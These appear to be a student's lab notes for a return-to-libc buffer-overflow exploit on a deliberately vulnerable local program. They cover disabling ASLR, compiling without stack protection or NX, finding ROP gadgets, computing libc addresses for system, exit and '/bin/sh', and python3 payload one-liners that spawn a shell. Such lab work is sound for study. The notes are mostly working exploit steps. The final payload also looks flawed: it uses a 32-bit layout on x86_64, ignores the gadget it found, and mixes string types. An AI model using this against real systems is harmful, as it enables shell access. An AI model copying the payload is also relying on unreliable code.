su
sysctl -w kernel.randomize_va_space=0
cat /proc/sys/kernel/randomize_va_space

gcc -g vulnerable.c -o vulnerable -fno-stack-protector -w
gcc -g -mpreferred-stack-boundary=4 -fno-stack-protector -no-pie vulnerable.c -o vulnerable
gcc -g -mpreferred-stack-boundary=4 -fno-stack-protector vulnerable.c -o vulnerable
gcc -z execstack -mpreferred-stack-boundary=4 -fno-stack-protector vulnerable.c -o vulnerable  => No NX

┌──(seed㉿b1f22922289d)-[~/canary]
└─$ ldd vulnerable
        linux-vdso.so.1 (0x00007ffff7fc9000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dd9000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)

┌──(seed㉿b1f22922289d)-[~/canary]
└─$ cp /lib/x86_64-linux-gnu/libc.so.6 .
must have dot =>

ROPgadget --binary ./libc.so.6 | grep "pop rdi"


===========================
0x000000000002840e : pop rdi ; pop rbp ; ret
0x0000000000028215 : pop rdi ; ret
0x00000000000f989d : pop rdi ; ret 0xffff
0x0000000000149e5d : pop rdi ; retf
================================
=> pop_rdi = 0x0000000000028215 : pop rdi ; ret
gdb vulnerable -q

checksec --file=./vulnerable

b main
r
p system
p exit

======= Out put =====
(gdb) p system
$1 = {int (const char *)} 0x7ffff7e26ab0 <__libc_system>
(gdb) p exit
$2 = {void (int)} 0x7ffff7e18b30 <__GI_exit>
=====================================
info proc mappings
=============================
(gdb) info proc mappings
process 405
Mapped address spaces:

          Start Addr           End Addr       Size     Offset  Perms  objfile
      0x555555554000     0x555555555000     0x1000        0x0  r--p   /home/seed/canary/vulnerable
      0x555555555000     0x555555556000     0x1000     0x1000  r-xp   /home/seed/canary/vulnerable
      0x555555556000     0x555555557000     0x1000     0x2000  r--p   /home/seed/canary/vulnerable
      0x555555557000     0x555555558000     0x1000     0x2000  r--p   /home/seed/canary/vulnerable
      0x555555558000     0x555555559000     0x1000     0x3000  rw-p   /home/seed/canary/vulnerable
      0x555555559000     0x55555557a000    0x21000        0x0  rw-p   [heap]
      0x7ffff7dd6000     0x7ffff7dd9000     0x3000        0x0  rw-p
      0x7ffff7dd9000     0x7ffff7dff000    0x26000        0x0  r--p   /usr/lib/x86_64-linux-gnu/libc.so.6
      0x7ffff7dff000     0x7ffff7f56000   0x157000    0x26000  r-xp   /usr/lib/x86_64-linux-gnu/libc.so.6
      0x7ffff7f56000     0x7ffff7fab000    0x55000   0x17d000  r--p   /usr/lib/x86_64-linux-gnu/libc.so.6
===========================================
strings -a -t x /usr/lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
strings -a -t x libc.so.6 | grep "/bin/sh"
readelf -s libc.so.6 | grep "system"
================= OP ======================
┌──(seed㉿0b8c1e4b83c9)-[~]
└─$ strings -a -t x /usr/lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
 197e34 /bin/sh
AND info under || we have :
0x7ffff7dd9000

=================
address_of_/bin/sh = base_address_of_libc + offset
                   = 0x7ffff7dd9000 + 0x197e34
                   = 0x7ffff7f6ce34

============
Địa chỉ của system: 0x7ffff7e26ab0
Địa chỉ của exit: 0x7ffff7e18b30
Địa chỉ của /bin/sh: 0x7ffff7f6ce34 

r `python3 -c 'print('A'*16 + b'\xb0\x6a\xe2\xf7\xff\x7f\x00' + b'\x30\x8b\xe1\xf7\xff\x7f\x00' + b'\x34\xce\xf6\xf7\xff\x7f\x00')'`

./vulnerable `python3 -c 'print("A"*16 + "\xb0\x6a\xe2\xf7\xff\x7f\x00" + "\x30\x8b\xe1\xf7\xff\x7f\x00" + "\x34\xce\xf6\xf7\xff\x7f\x00")'`

